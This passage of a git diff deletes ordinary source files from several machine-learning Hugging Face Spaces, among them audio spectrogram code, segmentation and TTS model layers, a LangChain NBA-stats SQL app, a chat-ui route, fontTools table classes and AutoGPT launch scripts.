torch.exp(x) / C - - -def spectral_normalize_torch(magnitudes): - output = dynamic_range_compression_torch(magnitudes) - return output - - -def spectral_de_normalize_torch(magnitudes): - output = dynamic_range_decompression_torch(magnitudes) - return output - - -mel_basis = {} -hann_window = {} - - -def spectrogram_torch(y, n_fft, sampling_rate, hop_size, win_size, center=False): - if torch.min(y) < -1.: - print('min value is ', torch.min(y)) - if torch.max(y) > 1.: - print('max value is ', torch.max(y)) - - global hann_window - dtype_device = str(y.dtype) + '_' + str(y.device) - wnsize_dtype_device = str(win_size) + '_' + dtype_device - if wnsize_dtype_device not in hann_window: - hann_window[wnsize_dtype_device] = torch.hann_window(win_size).to(dtype=y.dtype, device=y.device) - - y = torch.nn.functional.pad(y.unsqueeze(1), (int((n_fft-hop_size)/2), int((n_fft-hop_size)/2)), mode='reflect') - y = y.squeeze(1) - - spec = torch.stft(y, n_fft, hop_length=hop_size, win_length=win_size, window=hann_window[wnsize_dtype_device], - center=center, pad_mode='reflect', normalized=False, 
onesided=True, return_complex=False) - - spec = torch.sqrt(spec.pow(2).sum(-1) + 1e-6) - return spec - - -def spec_to_mel_torch(spec, n_fft, num_mels, sampling_rate, fmin, fmax): - global mel_basis - dtype_device = str(spec.dtype) + '_' + str(spec.device) - fmax_dtype_device = str(fmax) + '_' + dtype_device - if fmax_dtype_device not in mel_basis: - mel = librosa_mel_fn(sampling_rate, n_fft, num_mels, fmin, fmax) - mel_basis[fmax_dtype_device] = torch.from_numpy(mel).to(dtype=spec.dtype, device=spec.device) - spec = torch.matmul(mel_basis[fmax_dtype_device], spec) - spec = spectral_normalize_torch(spec) - return spec - - -def mel_spectrogram_torch(y, n_fft, num_mels, sampling_rate, hop_size, win_size, fmin, fmax, center=False): - if torch.min(y) < -1.: - print('min value is ', torch.min(y)) - if torch.max(y) > 1.: - print('max value is ', torch.max(y)) - - global mel_basis, hann_window - dtype_device = str(y.dtype) + '_' + str(y.device) - fmax_dtype_device = str(fmax) + '_' + dtype_device - wnsize_dtype_device = str(win_size) + '_' + dtype_device - if fmax_dtype_device not in mel_basis: - mel = librosa_mel_fn(sampling_rate, n_fft, num_mels, fmin, fmax) - mel_basis[fmax_dtype_device] = torch.from_numpy(mel).to(dtype=y.dtype, device=y.device) - if wnsize_dtype_device not in hann_window: - hann_window[wnsize_dtype_device] = torch.hann_window(win_size).to(dtype=y.dtype, device=y.device) - - y = torch.nn.functional.pad(y.unsqueeze(1), (int((n_fft-hop_size)/2), int((n_fft-hop_size)/2)), mode='reflect') - y = y.squeeze(1) - - spec = torch.stft(y, n_fft, hop_length=hop_size, win_length=win_size, window=hann_window[wnsize_dtype_device], - center=center, pad_mode='reflect', normalized=False, onesided=True, return_complex=False) - - spec = torch.sqrt(spec.pow(2).sum(-1) + 1e-6) - - spec = torch.matmul(mel_basis[fmax_dtype_device], spec) - spec = spectral_normalize_torch(spec) - - return spec diff --git a/spaces/kira4424/Tacotron-zero-short-voice-clone/synthesizer/models/sublayer/pre_net.py b/spaces/kira4424/Tacotron-zero-short-voice-clone/synthesizer/models/sublayer/pre_net.py deleted file mode 100644 index 886646a154c68298deeec09dbad736d617f73155..0000000000000000000000000000000000000000 --- a/spaces/kira4424/Tacotron-zero-short-voice-clone/synthesizer/models/sublayer/pre_net.py +++ /dev/null @@ -1,27 +0,0 @@ -import torch.nn as nn -import torch.nn.functional as F - -class PreNet(nn.Module): - def __init__(self, in_dims, fc1_dims=256, fc2_dims=128, dropout=0.5): - super().__init__() - self.fc1 = nn.Linear(in_dims, fc1_dims) - self.fc2 = nn.Linear(fc1_dims, fc2_dims) - self.p = dropout - - def forward(self, x): - """forward - - Args: - x (3D tensor with size `[batch_size, num_chars, tts_embed_dims]`): input texts list - - Returns: - 3D tensor with size `[batch_size, num_chars, encoder_dims]` - - """ - x = self.fc1(x) - x = F.relu(x) - x = F.dropout(x, self.p, training=True) - x = self.fc2(x) - x = F.relu(x) - x = F.dropout(x, self.p, training=True) - return x diff --git a/spaces/kirch/Text2Video-Zero/annotator/uniformer/mmseg/models/decode_heads/psa_head.py b/spaces/kirch/Text2Video-Zero/annotator/uniformer/mmseg/models/decode_heads/psa_head.py deleted file mode 100644 index 480dbd1a081262e45bf87e32c4a339ac8f8b4ffb..0000000000000000000000000000000000000000 --- a/spaces/kirch/Text2Video-Zero/annotator/uniformer/mmseg/models/decode_heads/psa_head.py +++ /dev/null @@ -1,196 +0,0 @@ -import torch -import torch.nn as nn -import torch.nn.functional as F -from annotator.uniformer.mmcv.cnn import ConvModule 
- -from annotator.uniformer.mmseg.ops import resize -from ..builder import HEADS -from .decode_head import BaseDecodeHead - -try: - from annotator.uniformer.mmcv.ops import PSAMask -except ModuleNotFoundError: - PSAMask = None - - -@HEADS.register_module() -class PSAHead(BaseDecodeHead): - """Point-wise Spatial Attention Network for Scene Parsing. - - This head is the implementation of `PSANet - `_. - - Args: - mask_size (tuple[int]): The PSA mask size. It usually equals input - size. - psa_type (str): The type of psa module. Options are 'collect', - 'distribute', 'bi-direction'. Default: 'bi-direction' - compact (bool): Whether use compact map for 'collect' mode. - Default: True. - shrink_factor (int): The downsample factors of psa mask. Default: 2. - normalization_factor (float): The normalize factor of attention. - psa_softmax (bool): Whether use softmax for attention. - """ - - def __init__(self, - mask_size, - psa_type='bi-direction', - compact=False, - shrink_factor=2, - normalization_factor=1.0, - psa_softmax=True, - **kwargs): - if PSAMask is None: - raise RuntimeError('Please install mmcv-full for PSAMask ops') - super(PSAHead, self).__init__(**kwargs) - assert psa_type in ['collect', 'distribute', 'bi-direction'] - self.psa_type = psa_type - self.compact = compact - self.shrink_factor = shrink_factor - self.mask_size = mask_size - mask_h, mask_w = mask_size - self.psa_softmax = psa_softmax - if normalization_factor is None: - normalization_factor = mask_h * mask_w - self.normalization_factor = normalization_factor - - self.reduce = ConvModule( - self.in_channels, - self.channels, - kernel_size=1, - conv_cfg=self.conv_cfg, - norm_cfg=self.norm_cfg, - act_cfg=self.act_cfg) - self.attention = nn.Sequential( - ConvModule( - self.channels, - self.channels, - kernel_size=1, - conv_cfg=self.conv_cfg, - norm_cfg=self.norm_cfg, - act_cfg=self.act_cfg), - nn.Conv2d( - self.channels, mask_h * mask_w, kernel_size=1, bias=False)) - if psa_type == 'bi-direction': - self.reduce_p = ConvModule( - self.in_channels, - self.channels, - kernel_size=1, - conv_cfg=self.conv_cfg, - norm_cfg=self.norm_cfg, - act_cfg=self.act_cfg) - self.attention_p = nn.Sequential( - ConvModule( - self.channels, - self.channels, - kernel_size=1, - conv_cfg=self.conv_cfg, - norm_cfg=self.norm_cfg, - act_cfg=self.act_cfg), - nn.Conv2d( - self.channels, mask_h * mask_w, kernel_size=1, bias=False)) - self.psamask_collect = PSAMask('collect', mask_size) - self.psamask_distribute = PSAMask('distribute', mask_size) - else: - self.psamask = PSAMask(psa_type, mask_size) - self.proj = ConvModule( - self.channels * (2 if psa_type == 'bi-direction' else 1), - self.in_channels, - kernel_size=1, - padding=1, - conv_cfg=self.conv_cfg, - norm_cfg=self.norm_cfg, - act_cfg=self.act_cfg) - self.bottleneck = ConvModule( - self.in_channels * 2, - self.channels, - kernel_size=3, - padding=1, - conv_cfg=self.conv_cfg, - norm_cfg=self.norm_cfg, - act_cfg=self.act_cfg) - - def forward(self, inputs): - """Forward function.""" - x = self._transform_inputs(inputs) - identity = x - align_corners = self.align_corners - if self.psa_type in ['collect', 'distribute']: - out = self.reduce(x) - n, c, h, w = out.size() - if self.shrink_factor != 1: - if h % self.shrink_factor and w % self.shrink_factor: - h = (h - 1) // self.shrink_factor + 1 - w = (w - 1) // self.shrink_factor + 1 - align_corners = True - else: - h = h // self.shrink_factor - w = w // self.shrink_factor - align_corners = False - out = resize( - out, - size=(h, w), - mode='bilinear', - 
align_corners=align_corners) - y = self.attention(out) - if self.compact: - if self.psa_type == 'collect': - y = y.view(n, h * w, - h * w).transpose(1, 2).view(n, h * w, h, w) - else: - y = self.psamask(y) - if self.psa_softmax: - y = F.softmax(y, dim=1) - out = torch.bmm( - out.view(n, c, h * w), y.view(n, h * w, h * w)).view( - n, c, h, w) * (1.0 / self.normalization_factor) - else: - x_col = self.reduce(x) - x_dis = self.reduce_p(x) - n, c, h, w = x_col.size() - if self.shrink_factor != 1: - if h % self.shrink_factor and w % self.shrink_factor: - h = (h - 1) // self.shrink_factor + 1 - w = (w - 1) // self.shrink_factor + 1 - align_corners = True - else: - h = h // self.shrink_factor - w = w // self.shrink_factor - align_corners = False - x_col = resize( - x_col, - size=(h, w), - mode='bilinear', - align_corners=align_corners) - x_dis = resize( - x_dis, - size=(h, w), - mode='bilinear', - align_corners=align_corners) - y_col = self.attention(x_col) - y_dis = self.attention_p(x_dis) - if self.compact: - y_dis = y_dis.view(n, h * w, - h * w).transpose(1, 2).view(n, h * w, h, w) - else: - y_col = self.psamask_collect(y_col) - y_dis = self.psamask_distribute(y_dis) - if self.psa_softmax: - y_col = F.softmax(y_col, dim=1) - y_dis = F.softmax(y_dis, dim=1) - x_col = torch.bmm( - x_col.view(n, c, h * w), y_col.view(n, h * w, h * w)).view( - n, c, h, w) * (1.0 / self.normalization_factor) - x_dis = torch.bmm( - x_dis.view(n, c, h * w), y_dis.view(n, h * w, h * w)).view( - n, c, h, w) * (1.0 / self.normalization_factor) - out = torch.cat([x_col, x_dis], 1) - out = self.proj(out) - out = resize( - out, - size=identity.shape[2:], - mode='bilinear', - align_corners=align_corners) - out = self.bottleneck(torch.cat((identity, out), dim=1)) - out = self.cls_seg(out) - return out diff --git a/spaces/kmirijan/NBA-Stats/app.py b/spaces/kmirijan/NBA-Stats/app.py deleted file mode 100644 index 57962f1292548ecb2a9dfa763aa1ae7ece5fbe3d..0000000000000000000000000000000000000000 --- a/spaces/kmirijan/NBA-Stats/app.py +++ /dev/null @@ -1,112 +0,0 @@ -from langchain import SQLDatabaseChain -from langchain.sql_database import SQLDatabase -from langchain.llms.openai import OpenAI -from langchain.chat_models import ChatOpenAI -from langchain.prompts.prompt import PromptTemplate - -llm = ChatOpenAI(temperature=0, model_name="gpt-3.5-turbo", verbose=True) - -DEFAULT_TABLES = [ - 'Active Players', - 'Team_Per_Game_Statistics_2022_23', - "Team_Totals_Statistics_2022_23", - "Player_Total_Statistics_2022_23", - "Player_Per_Game_Statistics_2022_23" -] - -def get_prompt(): - _DEFAULT_TEMPLATE = """Given an input question, first create a syntactically correct {dialect} query to run, then look at the results of the query and return the answer. 
- Use the following format: - - Question: "Question here" - SQLQuery: "SQL Query to run" - SQLResult: "Result of the SQLQuery" - - Answer: "Final answer here" - - Only use the following tables: - - {table_info} - - Question: {input}""" - - PROMPT = PromptTemplate( - input_variables=["input", "table_info", "dialect"], template=_DEFAULT_TEMPLATE - ) - return PROMPT - -def check_query(query): - if query.startswith("### Query"): - split = query.split('\n\n') - q_text = split[0] - t_text = split[1] - - if t_text.startswith("### Tables"): - query_params = dict() - tables = t_text.split('\n') - query_params['tables'] = tables[1:] - query_params['q'] = q_text.split('\n')[1] - print(query_params) - return query_params - else: - return 'error' - return 'small' - -def get_db(q, tables): - if len(tables) == 0: - db = SQLDatabase.from_uri("sqlite:///nba_small.db", - sample_rows_in_table_info=2) - else: - tables.extend(DEFAULT_TABLES) - db = SQLDatabase.from_uri("sqlite:///nba.db", - include_tables = tables, - sample_rows_in_table_info=2) - return db -def answer_question(query): - PROMPT = get_prompt() - query_check = check_query(query) - if query_check == 'error': - return('ERROR: Wrong format for getting the big db schema') - if isinstance(query_check, dict): - q = query_check['q'] - tables = query_check['tables'] - if query_check == 'small': - q = query - tables = [] - db = get_db(q, tables) - - db_chain = SQLDatabaseChain.from_llm(llm, db, - prompt=PROMPT, - verbose=True, - return_intermediate_steps=True, - # use_query_checker=True - ) - result = db_chain(q) - return result['result'] - -if __name__ == "__main__": - import gradio as gr - # print(answer_question("Who is Harry's Father")) - - gr.Interface( - answer_question, - [ - gr.inputs.Textbox(lines=10, label="Query"), - ], - gr.outputs.Textbox(label="Response"), - title="Ask NBA Stats", - description=""" Ask NBA Stats is a tool that let's you ask a question with - the NBA SQL tables as a reference - - Ask a simple question to use the small database - - If you would like to access the large DB use format - - ### Query - single line query - - ### Tables - tables to access line by line - table1 - table2""" - ).launch() \ No newline at end of file diff --git a/spaces/koajoel/PolyFormer/fairseq/examples/criss/README.md b/spaces/koajoel/PolyFormer/fairseq/examples/criss/README.md deleted file mode 100644 index 4689ed7c10497a5100b28fe6d6801a7c089da569..0000000000000000000000000000000000000000 --- a/spaces/koajoel/PolyFormer/fairseq/examples/criss/README.md +++ /dev/null @@ -1,61 +0,0 @@ -# Cross-lingual Retrieval for Iterative Self-Supervised Training - -https://arxiv.org/pdf/2006.09526.pdf - -## Introduction - -CRISS is a multilingual sequence-to-sequnce pretraining method where mining and training processes are applied iteratively, improving cross-lingual alignment and translation ability at the same time. - -## Requirements: - -* faiss: https://github.com/facebookresearch/faiss -* mosesdecoder: https://github.com/moses-smt/mosesdecoder -* flores: https://github.com/facebookresearch/flores -* LASER: https://github.com/facebookresearch/LASER - -## Unsupervised Machine Translation -##### 1. Download and decompress CRISS checkpoints -``` -cd examples/criss -wget https://dl.fbaipublicfiles.com/criss/criss_3rd_checkpoints.tar.gz -tar -xf criss_checkpoints.tar.gz -``` -##### 2. Download and preprocess Flores test dataset -Make sure to run all scripts from examples/criss directory -``` -bash download_and_preprocess_flores_test.sh -``` - -##### 3. 
Run Evaluation on Sinhala-English -``` -bash unsupervised_mt/eval.sh -``` - -## Sentence Retrieval -##### 1. Download and preprocess Tatoeba dataset -``` -bash download_and_preprocess_tatoeba.sh -``` - -##### 2. Run Sentence Retrieval on Tatoeba Kazakh-English -``` -bash sentence_retrieval/sentence_retrieval_tatoeba.sh -``` - -## Mining -##### 1. Install faiss -Follow instructions on https://github.com/facebookresearch/faiss/blob/master/INSTALL.md -##### 2. Mine pseudo-parallel data between Kazakh and English -``` -bash mining/mine_example.sh -``` - -## Citation -```bibtex -@article{tran2020cross, - title={Cross-lingual retrieval for iterative self-supervised training}, - author={Tran, Chau and Tang, Yuqing and Li, Xian and Gu, Jiatao}, - journal={arXiv preprint arXiv:2006.09526}, - year={2020} -} -``` diff --git a/spaces/koajoel/PolyFormer/fairseq/examples/hubert/simple_kmeans/dump_w2v2_feature.py b/spaces/koajoel/PolyFormer/fairseq/examples/hubert/simple_kmeans/dump_w2v2_feature.py deleted file mode 100644 index a1f0d902acf0756580a1f4604feee8fc499a9a63..0000000000000000000000000000000000000000 --- a/spaces/koajoel/PolyFormer/fairseq/examples/hubert/simple_kmeans/dump_w2v2_feature.py +++ /dev/null @@ -1,95 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. - -import logging -import os -import sys - -import fairseq -import soundfile as sf -import torch -import torch.nn.functional as F - -from feature_utils import get_path_iterator, dump_feature - - -logging.basicConfig( - format="%(asctime)s | %(levelname)s | %(name)s | %(message)s", - datefmt="%Y-%m-%d %H:%M:%S", - level=os.environ.get("LOGLEVEL", "INFO").upper(), - stream=sys.stdout, -) -logger = logging.getLogger("dump_w2v2_feature") - - -class Wav2Vec2FeatureReader(object): - def __init__(self, ckpt_path, layer, max_chunk=1600000): - ( - model, - cfg, - task, - ) = fairseq.checkpoint_utils.load_model_ensemble_and_task([ckpt_path]) - self.model = model[0].eval().cuda() - self.task = task - self.layer = layer # assume this is 1-based like HuBERT - self.max_chunk = max_chunk - logger.info(f"TASK CONFIG:\n{self.task.cfg}") - logger.info(f" max_chunk = {self.max_chunk}") - logger.info(f" model:\n{self.model}") - - def read_audio(self, path, ref_len=None): - wav, sr = sf.read(path) - assert sr == self.task.cfg.sample_rate, sr - if wav.ndim == 2: - wav = wav.mean(-1) - assert wav.ndim == 1, wav.ndim - if ref_len is not None and abs(ref_len - len(wav)) > 160: - logging.warning(f"ref {ref_len} != read {len(wav)} ({path})") - return wav - - def get_feats(self, path, ref_len=None): - x = self.read_audio(path, ref_len) - with torch.no_grad(): - x = torch.from_numpy(x).float().cuda() - if self.task.cfg.normalize: - x = F.layer_norm(x, x.shape) - x = x.view(1, -1) - - feat = [] - for start in range(0, x.size(1), self.max_chunk): - x_chunk = x[:, start: start + self.max_chunk] - res = self.model.extract_features( - source=x_chunk, - padding_mask=None, - mask=False, - layer=self.layer - 1, - ) - feat_chunk = res["x"] - feat.append(feat_chunk) - return torch.cat(feat, 1).squeeze(0) - - -def main(tsv_dir, split, ckpt_path, layer, nshard, rank, feat_dir, max_chunk): - reader = Wav2Vec2FeatureReader(ckpt_path, layer, max_chunk) - generator, num = get_path_iterator(f"{tsv_dir}/{split}.tsv", nshard, rank) - dump_feature(reader, generator, num, split, nshard, rank, feat_dir) - - -if __name__ == "__main__": - import 
argparse - - parser = argparse.ArgumentParser() - parser.add_argument("tsv_dir") - parser.add_argument("split") - parser.add_argument("ckpt_path") - parser.add_argument("layer", type=int) - parser.add_argument("nshard", type=int) - parser.add_argument("rank", type=int) - parser.add_argument("feat_dir") - parser.add_argument("--max_chunk", type=int, default=1600000) - args = parser.parse_args() - logger.info(args) - - main(**vars(args)) diff --git a/spaces/kokofixcomputers/chat-ui/src/routes/conversation/+server.ts b/spaces/kokofixcomputers/chat-ui/src/routes/conversation/+server.ts deleted file mode 100644 index fbf6034f90b4ac27b7ae9c41b69e8c8516252556..0000000000000000000000000000000000000000 --- a/spaces/kokofixcomputers/chat-ui/src/routes/conversation/+server.ts +++ /dev/null @@ -1,61 +0,0 @@ -import type { RequestHandler } from "./$types"; -import { collections } from "$lib/server/database"; -import { ObjectId } from "mongodb"; -import { error, redirect } from "@sveltejs/kit"; -import { base } from "$app/paths"; -import { z } from "zod"; -import type { Message } from "$lib/types/Message"; -import { models, validateModel } from "$lib/server/models"; -import { authCondition } from "$lib/server/auth"; - -export const POST: RequestHandler = async ({ locals, request }) => { - const body = await request.text(); - - let title = ""; - let messages: Message[] = []; - - const values = z - .object({ - fromShare: z.string().optional(), - model: validateModel(models), - }) - .parse(JSON.parse(body)); - - if (values.fromShare) { - const conversation = await collections.sharedConversations.findOne({ - _id: values.fromShare, - }); - - if (!conversation) { - throw error(404, "Conversation not found"); - } - - title = conversation.title; - messages = conversation.messages; - values.model = conversation.model; - } - - const res = await collections.conversations.insertOne({ - _id: new ObjectId(), - title: - title || - "Untitled " + ((await collections.conversations.countDocuments(authCondition(locals))) + 1), - messages, - model: values.model, - createdAt: new Date(), - updatedAt: new Date(), - ...(locals.user ? { userId: locals.user._id } : { sessionId: locals.sessionId }), - ...(values.fromShare ? { meta: { fromShareId: values.fromShare } } : {}), - }); - - return new Response( - JSON.stringify({ - conversationId: res.insertedId.toString(), - }), - { headers: { "Content-Type": "application/json" } } - ); -}; - -export const GET: RequestHandler = async () => { - throw redirect(302, `${base}/`); -}; diff --git a/spaces/kquote03/lama-video-watermark-remover/saicinpainting/training/data/aug.py b/spaces/kquote03/lama-video-watermark-remover/saicinpainting/training/data/aug.py deleted file mode 100644 index b1246250924e79511b58cd3d7ab79de8012f8949..0000000000000000000000000000000000000000 --- a/spaces/kquote03/lama-video-watermark-remover/saicinpainting/training/data/aug.py +++ /dev/null @@ -1,84 +0,0 @@ -from albumentations import DualIAATransform, to_tuple -import imgaug.augmenters as iaa - -class IAAAffine2(DualIAATransform): - """Place a regular grid of points on the input and randomly move the neighbourhood of these point around - via affine transformations. - - Note: This class introduce interpolation artifacts to mask if it has values other than {0;1} - - Args: - p (float): probability of applying the transform. Default: 0.5. 
- - Targets: - image, mask - """ - - def __init__( - self, - scale=(0.7, 1.3), - translate_percent=None, - translate_px=None, - rotate=0.0, - shear=(-0.1, 0.1), - order=1, - cval=0, - mode="reflect", - always_apply=False, - p=0.5, - ): - super(IAAAffine2, self).__init__(always_apply, p) - self.scale = dict(x=scale, y=scale) - self.translate_percent = to_tuple(translate_percent, 0) - self.translate_px = to_tuple(translate_px, 0) - self.rotate = to_tuple(rotate) - self.shear = dict(x=shear, y=shear) - self.order = order - self.cval = cval - self.mode = mode - - @property - def processor(self): - return iaa.Affine( - self.scale, - self.translate_percent, - self.translate_px, - self.rotate, - self.shear, - self.order, - self.cval, - self.mode, - ) - - def get_transform_init_args_names(self): - return ("scale", "translate_percent", "translate_px", "rotate", "shear", "order", "cval", "mode") - - -class IAAPerspective2(DualIAATransform): - """Perform a random four point perspective transform of the input. - - Note: This class introduce interpolation artifacts to mask if it has values other than {0;1} - - Args: - scale ((float, float): standard deviation of the normal distributions. These are used to sample - the random distances of the subimage's corners from the full image's corners. Default: (0.05, 0.1). - p (float): probability of applying the transform. Default: 0.5. - - Targets: - image, mask - """ - - def __init__(self, scale=(0.05, 0.1), keep_size=True, always_apply=False, p=0.5, - order=1, cval=0, mode="replicate"): - super(IAAPerspective2, self).__init__(always_apply, p) - self.scale = to_tuple(scale, 1.0) - self.keep_size = keep_size - self.cval = cval - self.mode = mode - - @property - def processor(self): - return iaa.PerspectiveTransform(self.scale, keep_size=self.keep_size, mode=self.mode, cval=self.cval) - - def get_transform_init_args_names(self): - return ("scale", "keep_size") diff --git a/spaces/kukuhtw/AutoGPT/run_continuous.bat b/spaces/kukuhtw/AutoGPT/run_continuous.bat deleted file mode 100644 index 812aa01c1c5506c452665610c0e9e83a17c426f2..0000000000000000000000000000000000000000 --- a/spaces/kukuhtw/AutoGPT/run_continuous.bat +++ /dev/null @@ -1,3 +0,0 @@ -@echo off -set argument=--continuous -call run.bat %argument% diff --git a/spaces/kukuhtw/AutoGPT/run_continuous.sh b/spaces/kukuhtw/AutoGPT/run_continuous.sh deleted file mode 100644 index 1f4436c88503172c0578b15a8447ed8268502578..0000000000000000000000000000000000000000 --- a/spaces/kukuhtw/AutoGPT/run_continuous.sh +++ /dev/null @@ -1,3 +0,0 @@ -#!/bin/bash - -./run.sh --continuous $@ diff --git a/spaces/ky2k/Toxicity_Classifier_POC/.venv/lib/python3.9/site-packages/fontTools/ttLib/tables/C_O_L_R_.py b/spaces/ky2k/Toxicity_Classifier_POC/.venv/lib/python3.9/site-packages/fontTools/ttLib/tables/C_O_L_R_.py deleted file mode 100644 index b4bc5d0c200e58f793fff6d3ffe95b2d76d36c64..0000000000000000000000000000000000000000 --- a/spaces/ky2k/Toxicity_Classifier_POC/.venv/lib/python3.9/site-packages/fontTools/ttLib/tables/C_O_L_R_.py +++ /dev/null @@ -1,158 +0,0 @@ -# Copyright 2013 Google, Inc. All Rights Reserved. -# -# Google Author(s): Behdad Esfahbod - -from fontTools.misc.textTools import safeEval -from . import DefaultTable - - -class table_C_O_L_R_(DefaultTable.DefaultTable): - - """This table is structured so that you can treat it like a dictionary keyed by glyph name. - - ``ttFont['COLR'][]`` will return the color layers for any glyph. - - ``ttFont['COLR'][] = `` will set the color layers for any glyph. 
- """ - - @staticmethod - def _decompileColorLayersV0(table): - if not table.LayerRecordArray: - return {} - colorLayerLists = {} - layerRecords = table.LayerRecordArray.LayerRecord - numLayerRecords = len(layerRecords) - for baseRec in table.BaseGlyphRecordArray.BaseGlyphRecord: - baseGlyph = baseRec.BaseGlyph - firstLayerIndex = baseRec.FirstLayerIndex - numLayers = baseRec.NumLayers - assert firstLayerIndex + numLayers <= numLayerRecords - layers = [] - for i in range(firstLayerIndex, firstLayerIndex + numLayers): - layerRec = layerRecords[i] - layers.append(LayerRecord(layerRec.LayerGlyph, layerRec.PaletteIndex)) - colorLayerLists[baseGlyph] = layers - return colorLayerLists - - def _toOTTable(self, ttFont): - from . import otTables - from fontTools.colorLib.builder import populateCOLRv0 - - tableClass = getattr(otTables, self.tableTag) - table = tableClass() - table.Version = self.version - - populateCOLRv0( - table, - { - baseGlyph: [(layer.name, layer.colorID) for layer in layers] - for baseGlyph, layers in self.ColorLayers.items() - }, - glyphMap=ttFont.getReverseGlyphMap(rebuild=True), - ) - return table - - def decompile(self, data, ttFont): - from .otBase import OTTableReader - from . import otTables - - # We use otData to decompile, but we adapt the decompiled otTables to the - # existing COLR v0 API for backward compatibility. - reader = OTTableReader(data, tableTag=self.tableTag) - tableClass = getattr(otTables, self.tableTag) - table = tableClass() - table.decompile(reader, ttFont) - - self.version = table.Version - if self.version == 0: - self.ColorLayers = self._decompileColorLayersV0(table) - else: - # for new versions, keep the raw otTables around - self.table = table - - def compile(self, ttFont): - from .otBase import OTTableWriter - - if hasattr(self, "table"): - table = self.table - else: - table = self._toOTTable(ttFont) - - writer = OTTableWriter(tableTag=self.tableTag) - table.compile(writer, ttFont) - return writer.getAllData() - - def toXML(self, writer, ttFont): - if hasattr(self, "table"): - self.table.toXML2(writer, ttFont) - else: - writer.simpletag("version", value=self.version) - writer.newline() - for baseGlyph in sorted(self.ColorLayers.keys(), key=ttFont.getGlyphID): - writer.begintag("ColorGlyph", name=baseGlyph) - writer.newline() - for layer in self.ColorLayers[baseGlyph]: - layer.toXML(writer, ttFont) - writer.endtag("ColorGlyph") - writer.newline() - - def fromXML(self, name, attrs, content, ttFont): - if name == "version": # old COLR v0 API - setattr(self, name, safeEval(attrs["value"])) - elif name == "ColorGlyph": - if not hasattr(self, "ColorLayers"): - self.ColorLayers = {} - glyphName = attrs["name"] - for element in content: - if isinstance(element, str): - continue - layers = [] - for element in content: - if isinstance(element, str): - continue - layer = LayerRecord() - layer.fromXML(element[0], element[1], element[2], ttFont) - layers.append(layer) - self.ColorLayers[glyphName] = layers - else: # new COLR v1 API - from . 
import otTables - - if not hasattr(self, "table"): - tableClass = getattr(otTables, self.tableTag) - self.table = tableClass() - self.table.fromXML(name, attrs, content, ttFont) - self.table.populateDefaults() - self.version = self.table.Version - - def __getitem__(self, glyphName): - if not isinstance(glyphName, str): - raise TypeError(f"expected str, found {type(glyphName).__name__}") - return self.ColorLayers[glyphName] - - def __setitem__(self, glyphName, value): - if not isinstance(glyphName, str): - raise TypeError(f"expected str, found {type(glyphName).__name__}") - if value is not None: - self.ColorLayers[glyphName] = value - elif glyphName in self.ColorLayers: - del self.ColorLayers[glyphName] - - def __delitem__(self, glyphName): - del self.ColorLayers[glyphName] - - -class LayerRecord(object): - def __init__(self, name=None, colorID=None): - self.name = name - self.colorID = colorID - - def toXML(self, writer, ttFont): - writer.simpletag("layer", name=self.name, colorID=self.colorID) - writer.newline() - - def fromXML(self, eltname, attrs, content, ttFont): - for (name, value) in attrs.items(): - if name == "name": - setattr(self, name, value) - else: - setattr(self, name, safeEval(value)) diff --git a/spaces/ky2k/Toxicity_Classifier_POC/.venv/lib/python3.9/site-packages/fontTools/ttLib/tables/T_S_I__2.py b/spaces/ky2k/Toxicity_Classifier_POC/.venv/lib/python3.9/site-packages/fontTools/ttLib/tables/T_S_I__2.py deleted file mode 100644 index 43a17f6f1ffa82cd803a44ab61832c99259c9ea9..0000000000000000000000000000000000000000 --- a/spaces/ky2k/Toxicity_Classifier_POC/.venv/lib/python3.9/site-packages/fontTools/ttLib/tables/T_S_I__2.py +++ /dev/null @@ -1,15 +0,0 @@ -""" TSI{0,1,2,3,5} are private tables used by Microsoft Visual TrueType (VTT) -tool to store its hinting source data. - -TSI2 is the index table containing the lengths and offsets for the glyph -programs that are contained in the TSI3 table. It uses the same format as -the TSI0 table. 
-""" -from fontTools import ttLib - -superclass = ttLib.getTableClass("TSI0") - - -class table_T_S_I__2(superclass): - - dependencies = ["TSI3"] diff --git a/spaces/ky2k/Toxicity_Classifier_POC/.venv/lib/python3.9/site-packages/gradio/templates/cdn/assets/Model3D-98fc2b2c.css b/spaces/ky2k/Toxicity_Classifier_POC/.venv/lib/python3.9/site-packages/gradio/templates/cdn/assets/Model3D-98fc2b2c.css deleted file mode 100644 index cee82ea831d77ca0e001baf10a07f84e176679f0..0000000000000000000000000000000000000000 --- a/spaces/ky2k/Toxicity_Classifier_POC/.venv/lib/python3.9/site-packages/gradio/templates/cdn/assets/Model3D-98fc2b2c.css +++ /dev/null @@ -1 +0,0 @@ -.gallery.svelte-1ayixqk{padding:var(--size-1) var(--size-2)} diff --git a/spaces/ky2k/Toxicity_Classifier_POC/.venv/lib/python3.9/site-packages/gradio/templates/cdn/assets/index-9923ca49.js b/spaces/ky2k/Toxicity_Classifier_POC/.venv/lib/python3.9/site-packages/gradio/templates/cdn/assets/index-9923ca49.js deleted file mode 100644 index c103808bae5bfdeb5848190940debc7c7a69dd59..0000000000000000000000000000000000000000 --- a/spaces/ky2k/Toxicity_Classifier_POC/.venv/lib/python3.9/site-packages/gradio/templates/cdn/assets/index-9923ca49.js +++ /dev/null @@ -1,2 +0,0 @@ -import{C as ge,E as q,L as Pe}from"./index-0c011c1e.js";import{s as Te,t as S,p as be,L as Ve,i as xe,f as _e,u as ye,b as ve,v as qe,h as z,E as G}from"./index-90411bc1.js";import{cssLanguage as F,css as $e}from"./index-66e01a03.js";import{typescriptLanguage as we,jsxLanguage as Ce,tsxLanguage as Qe,javascriptLanguage as K,javascript as Ae}from"./index-72f11de8.js";import"./index-7c0e54a6.js";import"./Blocks-61158678.js";import"./Button-661a0701.js";import"./BlockLabel-95be8dd1.js";import"./Empty-96265974.js";/* empty css */import"./Copy-c4997e4e.js";import"./Download-e5de98da.js";const 